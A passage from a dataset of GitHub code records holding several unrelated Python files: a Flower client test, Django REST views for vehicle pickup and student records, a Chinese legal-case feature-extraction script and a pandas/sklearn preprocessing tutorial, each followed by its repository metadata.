)\n raise AssertionError() # Fail the test if no exception was raised\n except ValueError:\n pass\n\n\ndef test_start_numpy_client_transport_invalid() -> None:\n \"\"\"Test start_client(..., transport=...).\"\"\"\n # Prepare\n client: NumPyClient = NeedsWrappingClient()\n invalid_transport = \"invalid-transport-value\"\n\n # Execute\n try:\n start_numpy_client(\n server_address=\"0.0.0.0:8080\", client=client, transport=invalid_transport\n )\n raise AssertionError() # Fail the test if no exception was raised\n except ValueError:\n pass\n", "repo_name": "adap/flower", "sub_path": "src/py/flwr/client/app_test.py", "file_name": "app_test.py", "file_ext": "py", "file_size_in_byte": 3315, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3287, "dataset": "github-code", "pt": "61", "api": [{"api_name": "client.Client", "line_number": 22, "usage_type": "name"}, {"api_name": "flwr.common.GetPropertiesIns", "line_number": 25, "usage_type": "name"}, {"api_name": "flwr.common.GetPropertiesRes", "line_number": 25, "usage_type": "name"}, {"api_name": "flwr.common.GetParametersIns", "line_number": 29, "usage_type": "name"}, {"api_name": "flwr.common.GetParametersRes", "line_number": 29, "usage_type": "name"}, {"api_name": "flwr.common.FitIns", "line_number": 33, "usage_type": "name"}, {"api_name": "flwr.common.FitRes", "line_number": 33, "usage_type": "name"}, {"api_name": "flwr.common.EvaluateIns", "line_number": 37, "usage_type": "name"}, {"api_name": "flwr.common.EvaluateRes", "line_number": 37, "usage_type": "name"}, {"api_name": "numpy_client.NumPyClient", "line_number": 42, "usage_type": "name"}, {"api_name": "flwr.common.Config", "line_number": 45, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 45, "usage_type": "name"}, {"api_name": "flwr.common.Scalar", "line_number": 45, "usage_type": "name"}, {"api_name": "flwr.common.Config", "line_number": 49, "usage_type": "name"}, {"api_name": "flwr.common.NDArrays", "line_number": 49, "usage_type": "name"}, {"api_name": "flwr.common.NDArrays", "line_number": 54, "usage_type": "name"}, {"api_name": "flwr.common.Config", "line_number": 54, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 55, "usage_type": "name"}, {"api_name": "flwr.common.NDArrays", "line_number": 55, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 55, "usage_type": "name"}, {"api_name": "flwr.common.Scalar", "line_number": 55, "usage_type": "name"}, {"api_name": "flwr.common.NDArrays", "line_number": 60, "usage_type": "name"}, {"api_name": "flwr.common.Config", "line_number": 60, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 61, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 61, "usage_type": "name"}, {"api_name": "flwr.common.Scalar", "line_number": 61, "usage_type": "name"}, {"api_name": "client.Client", "line_number": 71, "usage_type": "argument"}, {"api_name": "client.Client", "line_number": 79, "usage_type": "argument"}, {"api_name": "client.Client", "line_number": 85, "usage_type": "name"}, {"api_name": "app.start_client", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy_client.NumPyClient", "line_number": 101, "usage_type": "name"}, {"api_name": "app.start_numpy_client", "line_number": 106, "usage_type": "call"}]} +{"seq_id": "17137585399", "text": "from rest_framework.permissions import AllowAny, IsAuthenticated\nfrom rest_framework.views import APIView\nfrom rest_framework.generics import ListAPIView\nfrom rest_framework.response import Response\nfrom rest_framework.serializers import Serializer\nfrom .serializers import PickUpSerializer\n\nfrom django.conf import settings\nfrom twilio.rest import Client\n\nfrom CustomerData.models import SalesData, CSR,CustomerTrack\nfrom CustomerData.serializers import CSRSerializer, SalesDataSerializer,CustomerTrackSerializer\nfrom .serializers import PickUpSerializer\n\n\nclass PickupView(APIView):\n def get(self, request, customerToken=None, format=None):\n if customerToken == None:\n customer = [(customer.rcNo,customer.customer_token) for customer in CustomerTrack.objects.all()]\n testdata = []\n for i in customer:\n Salesdata = [ testdata.append( CustomerTrackSerializer(SalesData)) for SalesData in CustomerTrack.objects.all().filter(\n rcNo__iexact=i[0],customer_token=i[1], status__iexact='ASSIGNED')]\n \n return Response({'Assigned': testdata})\n else:\n try:\n customer = CustomerTrack.objects.get(customer_token=customerToken)\n Salesdata = [CustomerTrackSerializer(SalesData) for SalesData in CustomerTrack.objects.all().filter(\n customer_token__iexact=customer.customer_token,status__iexact='ASSIGNED')]\n return Response({'Assigned': Salesdata})\n except:\n return Response({'Message': 'Requst NotFound'})\n\n def post(self, request, customerToken=None, format=None):\n data = request.data\n SalesData1= CustomerTrack.objects.get(\n customer_token=customerToken)\n if SalesData1.status=='ASSIGNED':\n serializer = PickUpSerializer(data=data)\n if serializer.is_valid():\n serializer.save(user=request.user)\n SalesData1.status='PICKED'\n SalesData1.save()\n CustomerData = [CustomerTrackSerializer(SalesData) for SalesData in CustomerTrack.objects.all().filter(\n customer_token=customerToken,status__iexact='PICKED')]\n\n # client = Client(settings.TWILIO_ACCOUNT_SID,\n # settings.TWILIO_AUTH_TOKEN)\n\n # message = 'Hi '+SalesData1.name + \\\n # ' your vehicle ' + SalesData1.rcNo + ' has been picked by the driver ' + \\\n # request.user.first_name + ' ' + request.user.last_name + ' +919008088227'\n # client.messages.create(\n # to=settings.CUSTOMER_NUMBER,\n # from_=settings.TWILIO_NUMBER,\n # body=message + u'\\U0001f680')\n return Response({'PickupDetails': serializer.data,\n 'CustomerData':CustomerData})\n else:\n return Response({'Message': 'Please upload the valid information'})\n\n elif SalesData1.status=='PICKED':\n return Response({'Message': 'Request is status is Picked'})\n\n elif SalesData1.status=='COMPLETED':\n return Response({'Message': 'Request is status is Completed'})\n \n\n", "repo_name": "siliconbrainz/Incident-Management-System-2", "sub_path": "Pickup/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 3294, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "rest_framework.views.APIView", "line_number": 16, "usage_type": "name"}, {"api_name": "CustomerData.models.CustomerTrack.objects.all", "line_number": 19, "usage_type": "call"}, {"api_name": "CustomerData.models.CustomerTrack.objects", "line_number": 19, "usage_type": "attribute"}, {"api_name": "CustomerData.models.CustomerTrack", "line_number": 19, "usage_type": "name"}, {"api_name": "CustomerData.serializers.CustomerTrackSerializer", "line_number": 22, "usage_type": "call"}, {"api_name": "CustomerData.models.SalesData", "line_number": 22, "usage_type": "argument"}, {"api_name": "CustomerData.models.CustomerTrack.objects.all", "line_number": 22, "usage_type": "call"}, {"api_name": "CustomerData.models.CustomerTrack.objects", "line_number": 22, "usage_type": "attribute"}, {"api_name": "CustomerData.models.CustomerTrack", "line_number": 22, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 25, "usage_type": "call"}, {"api_name": "CustomerData.models.CustomerTrack.objects.get", "line_number": 28, "usage_type": "call"}, {"api_name": "CustomerData.models.CustomerTrack.objects", "line_number": 28, "usage_type": "attribute"}, {"api_name": "CustomerData.models.CustomerTrack", "line_number": 28, "usage_type": "name"}, {"api_name": "CustomerData.serializers.CustomerTrackSerializer", "line_number": 29, "usage_type": "call"}, {"api_name": "CustomerData.models.SalesData", "line_number": 29, "usage_type": "argument"}, {"api_name": "CustomerData.models.CustomerTrack.objects.all", "line_number": 29, "usage_type": "call"}, {"api_name": "CustomerData.models.CustomerTrack.objects", "line_number": 29, "usage_type": "attribute"}, {"api_name": "CustomerData.models.CustomerTrack", "line_number": 29, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 31, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 33, "usage_type": "call"}, {"api_name": "CustomerData.models.CustomerTrack.objects.get", "line_number": 37, "usage_type": "call"}, {"api_name": "CustomerData.models.CustomerTrack.objects", "line_number": 37, "usage_type": "attribute"}, {"api_name": "CustomerData.models.CustomerTrack", "line_number": 37, "usage_type": "name"}, {"api_name": "serializers.PickUpSerializer", "line_number": 40, "usage_type": "call"}, {"api_name": "CustomerData.models", "line_number": 45, "usage_type": "name"}, {"api_name": "CustomerData.serializers.CustomerTrackSerializer", "line_number": 45, "usage_type": "call"}, {"api_name": "CustomerData.models.SalesData", "line_number": 45, "usage_type": "argument"}, {"api_name": "CustomerData.models.CustomerTrack.objects.all", "line_number": 45, "usage_type": "call"}, {"api_name": "CustomerData.models.CustomerTrack.objects", "line_number": 45, "usage_type": "attribute"}, {"api_name": "CustomerData.models.CustomerTrack", "line_number": 45, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 58, "usage_type": "call"}, {"api_name": "CustomerData.models", "line_number": 59, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 61, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 64, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 67, "usage_type": "call"}]} +{"seq_id": "40379002419", "text": "# -*- coding: utf-8 -*-\nimport re\nimport os\nimport csv\nfrom pyltp import NamedEntityRecognizer\nfrom pyltp import Postagger\nfrom pyltp import Segmentor\nimport glob\nfrom utils import extract_seg\nfrom utils import sentence_result\nfrom utils import remove_duplicate_elements\nfrom utils import find_element\n\npunctuation = ''',。、:;()XX×xa\"“”,<《》'''\n\nf = open(\"case.txt\", \"r\", encoding=\"utf-8\")\ncase = f.read().strip()\nf.close()\n\n# 预处理\nline1 = re.sub(u\"(.*?)\", \"\", case) # 去除括号内注释\nline2 = re.sub(\"[%s]+\" % punctuation, \"\", line1) # 去除标点、特殊字母\nf2 = open(\"preprocessed_data.txt\", \"w\", encoding='utf-8')\nf2.write(line2)\nf2.close()\n\n# 分词、词性标注、命名实体识别\nLTP_DATA_DIR = '/home/zhangshiwei/ltp_data_v3.4.0/' # ltp模型目录的路径,根据实际情况修改\ncws_model_path = os.path.join(LTP_DATA_DIR,\n 'cws.model') # 分词模型路径,模型名称为`cws.model`\npos_model_path = os.path.join(LTP_DATA_DIR,\n 'pos.model') # 词性标注模型路径,模型名称为`pos.model`\nner_model_path = os.path.join(LTP_DATA_DIR,\n 'ner.model') # 命名实体识别模型路径,模型名称为`ner.model`\n# 分词\nsegmentor = Segmentor() # 初始化分词实例\nsegmentor.load_with_lexicon(cws_model_path,\n '/home/zhangshiwei/Event-Extraction/02分词/分词算法/05LTP分词/dict') # 加载分词模型,以及自定义词典\nseg_list = segmentor.segment(line2) # 分词\n# 词性标注\npostagger = Postagger() # 初始化词性标注实例\npostagger.load(pos_model_path) # 加载模型\npostags = postagger.postag(seg_list) # 词性标注\n# 命名实体识别\nrecognizer = NamedEntityRecognizer() # 初始化命名实体识别实例\nrecognizer.load(ner_model_path) # 加载模型\nnetags = recognizer.recognize(seg_list, postags) # 命名实体识别\n# 写入结果\nf1 = open(\"分词_词性标注_命名实体识别_结果.txt\", \"w\", encoding='utf-8')\nfor word, postag, netag in zip(seg_list, postags, netags):\n if word == '\\n':\n f1.write('\\n')\n else:\n f1.write(word + \" \" + postag + \" \" + netag + \"\\n\")\nf1.close()\n\n# CRF识别事件要素\nif os.path.exists(\"CRF结果.txt\"):\n os.remove(\"CRF结果.txt\")\nos.system(\n \"cd /home/zhangshiwei/CRF++-0.58 && crf_test -m model /home/zhangshiwei/Event-Extraction/07案件相似度/分词_词性标注_命名实体识别_结果.txt >> /home/zhangshiwei/Event-Extraction/07案件相似度/CRF结果.txt\")\n\n\ndef get_event_elements(case_file):\n \"\"\"\n 将案件中属于同一事件要素的词语合并,最终返回完整的事件要素\n :param case_file: 记录单个案件的文本文件\n :return event_elements: 返回一个字典,键为事件要素类型,值为对应的事件要素组成的list\n \"\"\"\n words = [] # 保存所有属于事件要素的单词\n element_types = [] # 保存上述单词对应的事件要素类型\n\n with open(case_file, \"r\", encoding='utf-8') as f1:\n rows = []\n # 将文本转换成list,方便后续处理\n for line in f1.readlines():\n rows.append(line.strip(\"\\n\").split(\"\\t\"))\n\n for index, row in enumerate(rows):\n if \"S\" in row[-1]:\n # S出现在最后一个位置,说明这是一个单独的事件要素,将其加入words列表\n words.append(row[0])\n element_types.append(row[-1][-1])\n\n elif \"B\" in row[-1]:\n # 处理由多个单词组成的事件要素\n words.append(row[0])\n element_types.append(row[-1][-1])\n j = index + 1\n while \"I\" in rows[j][-1] or \"E\" in rows[j][-1]:\n words[-1] += rows[j][0]\n j += 1\n if j == len(rows):\n break\n\n # 将事件要素进行分类(将words列表中的元素按照类别分成6类)\n T = [] # 事故类型\n K = [] # 罪名\n D = [] # 主次责任\n P = [] # 积极因素(减刑因素)\n N = [] # 消极因素(加刑因素)\n R = [] # 判决结果\n\n for i in range(len(element_types)):\n if element_types[i] == \"T\":\n T.append(words[i])\n elif element_types[i] == \"K\":\n K.append(words[i])\n elif element_types[i] == \"D\":\n D.append(words[i])\n elif element_types[i] == \"P\":\n P.append(words[i])\n elif element_types[i] == \"N\":\n N.append(words[i])\n elif element_types[i] == \"R\":\n R.append(words[i])\n\n # 为了防止CRF未能抽取出全部的事件要素,因此使用规则化的方法,从原始文本中直接提取出部分事件要素,作为补充\n case = \"\" # case是完整的案件内容\n for idx in range(len(rows)):\n case += rows[idx][0]\n\n if \"无证\" in case or \"驾驶资格\" in case:\n N.append(\"无证驾驶\")\n if \"无号牌\" in case or \"牌照\" in case or \"无牌\" in case:\n N.append(\"无牌驾驶\")\n if \"酒\" in case:\n N.append(\"酒后驾驶\")\n if \"吸毒\" in case or \"毒品\" in case or \"毒驾\" in case:\n N.append(\"吸毒后驾驶\")\n if \"超载\" in case:\n N.append(\"超载\")\n if \"逃逸\" in case or \"逃离\" in case:\n N.append(\"逃逸\")\n if (\"有前科\" in case or \"有犯罪前科\" in case) and (\n \"无前科\" not in case and \"无犯罪前科\" not in case):\n N.append(\"有犯罪前科\")\n\n # 整理抽取结果\n event_elements = dict() # 用字典存储各类事件要素\n event_elements[\"事故类型\"] = remove_duplicate_elements(T)\n event_elements[\"罪名\"] = remove_duplicate_elements(K)\n event_elements[\"主次责任\"] = remove_duplicate_elements(D)\n event_elements[\"减刑因素\"] = remove_duplicate_elements(P)\n event_elements[\"加刑因素\"] = remove_duplicate_elements(N)\n event_elements[\"判决结果\"] = remove_duplicate_elements(R)\n\n # 打印出完整的事件要素\n for key, value in event_elements.items():\n print(key, value)\n\n return event_elements\n\n\ndef get_patterns_from_dict(event_elements):\n \"\"\"\n 将提取出的事件要素转换成特征\n :param event_elements: 字典形式的事件要素\n :return patterns: 字典形式的特征\n \"\"\"\n patterns = dict()\n\n # 从事件要素中的\"加刑因素\"提取出三个特征:01死亡人数、02重伤人数、03轻伤人数\n patterns[\"01死亡人数\"], patterns[\"02重伤人数\"], patterns[\"03轻伤人数\"] = extract_seg(\n \"\".join(event_elements[\"加刑因素\"]))\n\n # 从事件要素中的\"主次责任\"提取出特征:04责任认定\n patterns[\"04责任认定\"] = find_element(event_elements[\"主次责任\"], \"全部责任\")\n\n # 从事件要素中的\"加刑因素\"提取出8个特征\n patterns[\"05是否酒后驾驶\"] = find_element(event_elements[\"加刑因素\"], \"酒\")\n patterns[\"06是否吸毒后驾驶\"] = find_element(event_elements[\"加刑因素\"], \"毒\")\n patterns[\"07是否无证驾驶\"] = find_element(event_elements[\"加刑因素\"], \"驾驶证\", \"证\")\n patterns[\"08是否无牌驾驶\"] = find_element(event_elements[\"加刑因素\"], \"牌照\", \"牌\")\n patterns[\"09是否不安全驾驶\"] = find_element(event_elements[\"加刑因素\"], \"安全\")\n patterns[\"10是否超载\"] = find_element(event_elements[\"加刑因素\"], \"超载\")\n patterns[\"11是否逃逸\"] = find_element(event_elements[\"加刑因素\"], \"逃逸\", \"逃离\")\n patterns[\"是否初犯偶犯\"] = 1 - int(find_element(event_elements[\"加刑因素\"], \"前科\"))\n\n # 从事件要素中的\"减刑因素\"提取出7个特征\n patterns[\"12是否抢救伤者\"] = find_element(event_elements[\"减刑因素\"], \"抢救\", \"施救\")\n patterns[\"13是否报警\"] = find_element(event_elements[\"减刑因素\"], \"报警\", \"自首\", \"投案\")\n patterns[\"14是否现场等待\"] = find_element(event_elements[\"减刑因素\"], \"现场\", \"等候\")\n patterns[\"15是否赔偿\"] = find_element(event_elements[\"减刑因素\"], \"赔偿\")\n patterns[\"16是否认罪\"] = find_element(event_elements[\"减刑因素\"], \"认罪\")\n patterns[\"17是否如实供述\"] = find_element(event_elements[\"减刑因素\"], \"如实\")\n if patterns[\"是否初犯偶犯\"] == 0:\n patterns[\"18是否初犯偶犯\"] = \"0\"\n else:\n patterns[\"18是否初犯偶犯\"] = \"1\"\n return patterns\n\n\ndef label_case(file, is_label=False):\n \"\"\"\n 给数据打标签\n :param is_label: 是否需要将刑期分类,默认不分类\n :param file: 无标签的preprocessed_data.txt\n :return:\n \"\"\"\n f = open(file, 'r', encoding='utf-8')\n cases = f.readlines()\n labels = []\n for case in cases:\n labels.append(sentence_result(case))\n f.close()\n\n # 分类\n if is_label:\n for i in range(len(labels)):\n if 0 <= labels[i] <= 5:\n labels[i] = 0\n elif 6 <= labels[i] <= 18:\n labels[i] = 1\n elif 19 <= labels[i] <= 24:\n labels[i] = 2\n elif 25 <= labels[i] <= 36:\n labels[i] = 3\n else:\n labels[i] = 4\n\n return labels\n\n\nheaders = [\n '01死亡人数',\n \"02重伤人数\",\n \"04责任认定\",\n \"05是否酒后驾驶\",\n \"06是否吸毒后驾驶\",\n \"07是否无证驾驶\",\n \"08是否无��驾驶\",\n \"09是否不安全驾驶\",\n \"10是否超载\",\n \"11是否逃逸\",\n \"12是否抢救伤者\",\n \"13是否报警\",\n \"14是否现场等待\",\n \"15是否赔偿\",\n \"16是否认罪\",\n \"18是否初犯偶犯\",\n \"判决结果\"]\nrows = []\n\n# 提取标签\nlabels = label_case(\"preprocessed_data.txt\", is_label=True)\nnum_cases = 1\n\nf1 = open(\"preprocessed_data.txt\", \"r\", encoding=\"utf-8\")\ncases = f1.readlines()\n\nevent_elements = get_event_elements(\"CRF结果.txt\")\npatterns = get_patterns_from_dict(event_elements)\n\n# 因为目前CRF提取的效果还不够好,伤亡情况可能没有提取出来\n# 保险起见,对整个案件进行提取死亡人数等3个特征,而非事件抽取的结果\npatterns['01死亡人数'], patterns['02重伤人数'], patterns['03轻伤人数'] = extract_seg(line2)\npatterns[\"判决结果\"] = labels[0]\ndel patterns[\"是否初犯偶犯\"]\ndel patterns[\"03轻伤人数\"]\ndel patterns[\"17是否如实供述\"]\nrows.append(patterns)\nf1.close()\n\n# 写回数据\nwith open(\"pattern.csv\", \"w\", newline='') as f:\n f_csv = csv.DictWriter(f, headers)\n # f_csv.writeheader()\n f_csv.writerows(rows)\n\nf3 = open(\"pattern.csv\", \"r\")\nf3_csv = list(csv.reader(f3))\n\nf4 = open(\"/home/zhangshiwei/Event-Extraction/06判决结果预测/特征提取/data.csv\", \"r\")\nf4_csv = list(csv.reader(f4))\n\nmark = []\nfor i in range(len(f4_csv)):\n if f3_csv[0] == f4_csv[i]:\n mark.append(i)\nf3.close()\nf4.close()\n\nwith open(\"类似案件.txt\", \"w\", encoding=\"utf-8\") as f5:\n f6 = open(\"/home/zhangshiwei/Event-Extraction/01数据预处理/preprocessed_data.txt\", \"r\", encoding=\"utf-8\")\n contents = f6.readlines()\n for i in range(len(mark)):\n f5.write(contents[i])\n f6.close()\n", "repo_name": "zhang17173/Event-Extraction", "sub_path": "07案件相似度/案件特征提取.py", "file_name": "案件特征提取.py", "file_ext": "py", "file_size_in_byte": 11429, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 524, "dataset": "github-code", "pt": "61", "api": [{"api_name": "re.sub", "line_number": 21, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path", "line_number": 31, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path", "line_number": 33, "usage_type": "attribute"}, {"api_name": "pyltp.Segmentor", "line_number": 36, "usage_type": "call"}, {"api_name": "pyltp.Postagger", "line_number": 41, "usage_type": "call"}, {"api_name": "pyltp.NamedEntityRecognizer", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 58, "usage_type": "call"}, {"api_name": "os.path", "line_number": 58, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 59, "usage_type": "call"}, {"api_name": "os.system", "line_number": 60, "usage_type": "call"}, {"api_name": "utils.remove_duplicate_elements", "line_number": 141, "usage_type": "call"}, {"api_name": "utils.remove_duplicate_elements", "line_number": 142, "usage_type": "call"}, {"api_name": "utils.remove_duplicate_elements", "line_number": 143, "usage_type": "call"}, {"api_name": "utils.remove_duplicate_elements", "line_number": 144, "usage_type": "call"}, {"api_name": "utils.remove_duplicate_elements", "line_number": 145, "usage_type": "call"}, {"api_name": "utils.remove_duplicate_elements", "line_number": 146, "usage_type": "call"}, {"api_name": "utils.extract_seg", "line_number": 164, "usage_type": "call"}, {"api_name": "utils.find_element", "line_number": 168, "usage_type": "call"}, {"api_name": "utils.find_element", "line_number": 171, "usage_type": "call"}, {"api_name": "utils.find_element", "line_number": 172, "usage_type": "call"}, {"api_name": "utils.find_element", "line_number": 173, "usage_type": "call"}, {"api_name": "utils.find_element", "line_number": 174, "usage_type": "call"}, {"api_name": "utils.find_element", "line_number": 175, "usage_type": "call"}, {"api_name": "utils.find_element", "line_number": 176, "usage_type": "call"}, {"api_name": "utils.find_element", "line_number": 177, "usage_type": "call"}, {"api_name": "utils.find_element", "line_number": 178, "usage_type": "call"}, {"api_name": "utils.find_element", "line_number": 181, "usage_type": "call"}, {"api_name": "utils.find_element", "line_number": 182, "usage_type": "call"}, {"api_name": "utils.find_element", "line_number": 183, "usage_type": "call"}, {"api_name": "utils.find_element", "line_number": 184, "usage_type": "call"}, {"api_name": "utils.find_element", "line_number": 185, "usage_type": "call"}, {"api_name": "utils.find_element", "line_number": 186, "usage_type": "call"}, {"api_name": "utils.sentence_result", "line_number": 205, "usage_type": "call"}, {"api_name": "utils.extract_seg", "line_number": 257, "usage_type": "call"}, {"api_name": "csv.DictWriter", "line_number": 267, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 272, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 275, "usage_type": "call"}]} +{"seq_id": "9128365884", "text": "import pandas as pd\nfrom io import StringIO\n\ndata = '''\na,b,c,d\n1,2,3,4\n5,6,,8\n9,10,11,12\n'''\n\ndf = pd.read_csv(StringIO(data))\ndf\n\n# null count 확인\ndf.isnull().sum()\n\n# 데이터\ndf1 = df\ndf1.dropna(axis=0)\ndf1.dropna(axis=1)\n\ndata2 = '''\na,b,c,d\n1,2,3,\n5,6,,\n,,,\n'''\ndf2 = pd.read_csv(StringIO(data2))\ndf2\ndf2.dropna(how='all')\ndf2.dropna(axis=1, how='all')\n\ndf1\ndf1.dropna(thresh=4)\n\ndf1\ndf1.dropna(subset=['c'])\n\n\nfrom sklearn.impute import SimpleImputer\n\nimr = SimpleImputer(strategy='mean')\nimr = imr.fit(df.values)\nimputed_data = imr.transform(df.values)\nimputed_data\n\nimport pandas as pd\ndata = pd.DataFrame([\n [1, 'B', 'S', 13],\n [2, 'R', 'D', 9],\n [3, 'R', 'H', 9],\n [4, 'B', 'C', 3],\n [5, 'B', 'S', 12]\n])\n\ndata.columns=[\"no\", \"color\", \"shape\", \"number\"]\ndata\n\nshape_order = {\n 'S' : 1,\n 'D' : 2,\n 'C' : 3,\n 'H' : 4\n}\ndata['shape'] = data['shape'].map(shape_order)\ndata\n\ninv_shape_order = {v: k for k, v in shape_order.items()}\ndata['shape'].map(inv_shape_order)\n\nimport numpy as np\nclass_mapping = {label : idx for idx, label in enumerate(np.unique(data[\"shape\"]))}\nclass_mapping\n\ndata[\"shape\"] = data[\"shape\"].map(class_mapping)\ndata\n\ninv_class_mapping = {v : k for k, v in class_mapping.items()}\ndata[\"shape\"] = data[\"shape\"].map(inv_class_mapping)\ndata\n\nfrom sklearn.preprocessing import LabelEncoder\n\nlabeler = LabelEncoder()\ny = labeler.fit_transform(data[\"shape\"].values)\ny\n\nlabeler.inverse_transform(y)\n\ny_color = labeler.fit_transform(data[\"color\"].values)\ny_color\n\nimport numpy as np\nfrom sklearn.preprocessing import OneHotEncoder\n\nencoder = OneHotEncoder(handle_unknown='ignore')\nencoder.fit(data[[\"shape\"]].values)\nencoder.categories_\ndf_dummy = pd.DataFrame(encoder.transform(data[[\"shape\"]].values).toarray(), columns=[\"is_C\", \"is_D\", \"is_H\", \"is_S\"])\n\ndata_prep = pd.concat([data, df_dummy], axis=1)\ndata_prep\n\npd.get_dummies(data[\"shape\"])\n\nimport numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.datasets import load_wine\n\ndf_wine = pd.DataFrame(load_wine().data, columns=load_wine().feature_names)\ndf_wine_label = pd.DataFrame(load_wine().target, columns=[\"class\"])\ndf_wine = pd.concat([df_wine, df_wine_label], axis=1)\nprint(load_wine().DESCR)\nprint('레이블: ', np.unique(df_wine[\"class\"]))\n\ndf_x, df_y = df_wine.iloc[:, 0:12].values, df_wine.iloc[:, 13].values\nnp.unique(df_y)\nx_train, x_test, y_train, y_test = train_test_split(df_x, df_y, test_size=0.3, random_state=0, stratify=df_y)\n\nprint(x_train)\nprint(x_test)\nprint(y_train)\nprint(y_test)\n\nfrom sklearn.preprocessing import MinMaxScaler\n\nmms = MinMaxScaler()\nx_train_norm = mms.fit_transform(x_train)\nx_test_norm = mms.fit_transform(x_test)\n\n\n\n", "repo_name": "slykid/Python3", "sub_path": "Field Test Code/preprocessing1.py", "file_name": "preprocessing1.py", "file_ext": "py", "file_size_in_byte": 2715, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pandas.read_csv", "line_number": 11, "usage_type": "call"}, {"api_name": "io.StringIO", "line_number": 11, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 28, "usage_type": "call"}, {"api_name": "io.StringIO", "line_number": 28, "usage_type": "call"}, {"api_name": "sklearn.impute.SimpleImputer", "line_number": 42, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 72, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.LabelEncoder", "line_number": 84, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.OneHotEncoder", "line_number": 96, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 99, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 101, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 104, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 111, "usage_type": "call"}, {"api_name": "sklearn.datasets.load_wine", "line_number": 111, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 112, "usage_type": "call"}, {"api_name": "sklearn.datasets.load_wine", "line_number": 112, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 113, "usage_type": "call"}, {"api_name": "sklearn.datasets.load_wine", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 115, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 118, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 119, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 128, "usage_type": "call"}]} +{"seq_id": "42813293838", "text": "from rest_framework.response import Response\nfrom rest_framework.decorators import api_view\n\nfrom api.models import Student\n# Create your views here.\n\nfrom .serializears import StudentSerializer\n\n@api_view(['GET'])\ndef index(request):\n students = Student.objects.all()\n serialstudents = StudentSerializer(students, many=True)\n return Response({\n 'status':200,\n 'students':serialstudents.data\n })\n\n@api_view(['GET'])\ndef studentView(request, pk):\n try :\n student = Student.objects.get(id=pk)\n serialstudent = StudentSerializer(student, many=False)\n return Response({\n 'status':200,\n 'students':serialstudent.data,\n })\n except :\n return Response({'status':400})\n\n\n@api_view(['POST'])\ndef studentAdd(request):\n try:\n \n serialdata = StudentSerializer(data=request.data)\n if serialdata.is_valid():\n serialdata.save()\n \n return Response({\n 'status':200,\n 'student':serialdata.data,\n 'message':'Student added successfully'\n })\n\n except:\n return Response({'status':400})\n\n@api_view(['POST'])\ndef studentUpdate(request, pk):\n try :\n student = Student.objects.get(id=pk)\n serialstudent = StudentSerializer(instance=student, data=request.data)\n\n if serialstudent.is_valid():\n serialstudent.save()\n \n return Response({\n 'status':200,\n 'student':serialstudent.data,\n 'message':'Updated successfully'\n })\n\n except :\n return Response({'status':400})\n\n\n@api_view(['DELETE'])\ndef studentdelete(request, pk):\n try:\n\n student = Student.objects.get(id=pk)\n student.delete()\n \n students = Student.objects.all()\n serialstudents = StudentSerializer(students, many=True)\n \n return Response({\n 'status':200,\n 'student':serialstudents.data,\n 'message':'Student Deleted successfully'\n })\n\n except:\n return Response({'status':400})", "repo_name": "nirjana/student-", "sub_path": "api/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2100, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "api.models.Student.objects.all", "line_number": 11, "usage_type": "call"}, {"api_name": "api.models.Student.objects", "line_number": 11, "usage_type": "attribute"}, {"api_name": "api.models.Student", "line_number": 11, "usage_type": "name"}, {"api_name": "serializears.StudentSerializer", "line_number": 12, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 13, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 9, "usage_type": "call"}, {"api_name": "api.models.Student.objects.get", "line_number": 21, "usage_type": "call"}, {"api_name": "api.models.Student.objects", "line_number": 21, "usage_type": "attribute"}, {"api_name": "api.models.Student", "line_number": 21, "usage_type": 